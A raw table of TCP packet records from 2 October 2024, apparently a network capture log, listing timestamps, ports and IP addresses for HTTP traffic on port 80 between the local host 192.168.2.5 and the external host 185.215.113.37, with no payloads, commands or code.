Oct 2, 2024 23:10:05.155039072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.155049086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.155083895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.155730963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.155764103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.155785084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.155796051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.155808926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.155829906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.155841112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.155862093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.155875921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.155895948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.155904055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.155940056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.156548977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.156582117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.156606913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.156614065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.156624079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.156646967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.156661034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.156688929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.162435055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.162498951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.162673950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.162707090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.162798882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.162844896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.162859917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.162893057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.162895918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.162919998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.162942886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.163048983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.163081884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.163104057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.163120985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.208810091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.208956003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.208988905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209079981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209079981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209079981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209220886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209253073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209280968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209286928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209300995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209333897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209336996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209393978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209849119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209881067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209902048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209913969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209928036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209945917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209959030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.209978104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.209990025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.210026026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.210752964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.210786104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.210808992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.210817099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.210825920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.210850000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.210860968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.210882902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.210894108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.210917950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.210926056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.210962057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.211656094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.211688995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.211709976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.211719990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.211731911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.211752892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.211764097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.211785078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.211798906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.211817026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.211831093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.211860895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.212481976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.212515116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.212534904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.212548018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.212558985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.212590933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.212593079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.212636948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.212645054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.212677956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.212696075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.212721109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.213526011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.213557959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.213581085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.213589907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.213602066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.213623047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.213634014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.213654995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.213665962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.213699102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.213721991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.213773012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.214194059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.214242935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.214246035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.214276075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.214286089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.214308023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.214319944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.214340925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.214353085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.214375019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.214384079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.214418888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.215231895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.215308905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.215329885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.215342999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.215354919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.215375900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.215401888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.215420961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.215426922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.215481043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216020107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216068983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216073036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216099977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216113091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216133118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216144085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216165066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216177940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216198921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216208935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216243982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216752052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216784000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216805935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216814995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216828108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216846943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216861963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216882944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216892004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216926098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.216952085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.216984987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.217015028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.217031956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.217602968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.217634916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.217653990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.217665911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.217679024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.217699051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.217709064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.217730999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.217741966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.217762947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.217775106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.217796087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.217807055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.217839003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.218463898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.218497038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.218518972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.218528032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.218539000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.218573093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.238274097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.238336086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.238532066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.238584995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.238599062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.238631010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.238646030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.238662958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.238671064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.238694906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.238712072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.238729000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.238740921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.238771915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239289999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239325047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239351034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239356995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239367008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239401102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239454985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239487886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239509106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239532948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239789009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239820957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239842892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239851952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239865065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239886045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239897013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239919901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.239931107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.239964962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.240602970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.240634918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.240655899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.240668058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.240678072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.240714073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.240714073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.240748882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.240760088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.240778923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.240793943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.240812063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:05.240823030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.240855932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.509704113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:05.515816927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:06.233128071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:06.233217955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:06.314862967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:06.320161104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:07.035152912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:07.035326958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:08.271696091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:08.277838945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:08.996546984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:08.996721029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.442385912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.448613882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665605068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665663004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665725946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.665740967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665747881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.665776968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665801048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.665811062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665827990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.665847063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665862083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.665884018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665898085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.665919065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.665935040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.665970087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.666420937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.666460037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.666490078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.666534901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.666656017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.666695118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.666727066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.666749001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.785481930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.785531998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.785568953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.785716057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.785716057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.785746098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.785778999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.785813093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.785825968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.785846949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.785932064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.786191940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.786259890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.786267996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.786300898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.786326885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.786334038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.786350012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.786367893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.786389112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.786422968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787178993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787214041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787245989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787245989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787267923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787277937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787293911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787328959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787655115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787705898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787715912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787739992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787756920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787771940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787790060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787806034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.787825108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.787858963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.788618088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.788650990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.788677931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.788683891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.788701057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.788733959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.918544054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.918598890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.918688059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.918716908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.918720007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.918751001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.918771982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.918785095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.918803930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.918817997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.918843031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.918855906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.918872118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.918909073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.919249058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.919282913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.919316053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.919318914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.919339895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.919351101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.919367075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.919409037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:10.919415951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:10.919473886 CEST	49704	80	192.168.2.5	185.215.113.37
